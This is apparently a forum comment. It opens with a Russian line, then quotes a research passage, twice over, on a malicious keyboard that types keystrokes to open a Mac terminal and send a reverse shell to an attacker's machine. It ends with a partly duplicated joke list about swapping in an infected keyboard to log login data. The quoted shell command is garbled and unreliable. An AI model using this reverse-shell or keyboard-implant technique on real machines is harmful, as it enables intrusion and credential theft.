Ну ты хоть ниже почитай.
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends ...
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends ...
1. Swap keyboard against infected one.
2. Log login data
3. Swap keyboard against original one.
4. Read login data
5. ???
6. Profit!
2. Log login data
3. Swap keyboard against original one.
4. Read login data
5. ???
6. Profit!